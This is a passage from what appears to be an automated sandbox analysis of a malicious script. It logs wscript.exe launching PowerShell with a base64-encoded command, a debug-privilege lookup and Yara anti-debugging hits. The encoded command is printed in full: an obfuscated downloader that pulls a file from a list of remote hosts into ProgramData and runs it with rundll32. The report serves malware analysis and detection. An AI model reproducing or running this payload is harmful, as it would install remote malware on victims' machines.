NgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQB1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA==" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 24, 2023, 11:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQ